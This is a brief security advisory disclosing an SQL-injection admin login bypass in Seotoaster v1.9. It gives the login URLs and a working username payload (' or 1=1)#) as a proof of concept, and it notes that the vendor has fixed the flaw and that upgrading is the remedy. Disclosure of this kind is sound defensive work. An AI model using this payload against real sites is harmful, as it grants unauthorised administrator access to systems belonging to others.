43 lines
No EOL
993 B
Text
43 lines
No EOL
993 B
Text
#################################################################################
|
|
# Advisory: Seotoaster SQL-Injection Admin Login Bypass
|
|
# Author: Stefan Schurtz
|
|
# Contact: sschurtz@t-online.de
|
|
# Affected Software: Successfully tested on Seotoaster v.1.9
|
|
# Vendor URL: http://www.seotoaster.com/
|
|
# Vendor Status: fixed
|
|
#################################################################################
|
|
|
|
==========================
|
|
Vulnerability Description
|
|
==========================
|
|
|
|
Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login
|
|
|
|
==================
|
|
PoC-Exploit
|
|
==================
|
|
|
|
http://<target>/seotoaster/go
|
|
or
|
|
http://<target>/go
|
|
|
|
User: ' or 1=1)#
|
|
PW: notimportant
|
|
|
|
=========
|
|
Solution
|
|
=========
|
|
|
|
Upgrade to the latest version
|
|
|
|
========
|
|
Credits
|
|
========
|
|
|
|
Vulnerabilitiy found and advisory written by Stefan Schurtz
|
|
|
|
===========
|
|
References
|
|
===========
|
|
|
|
http://secunia.com/advisories/46881/ |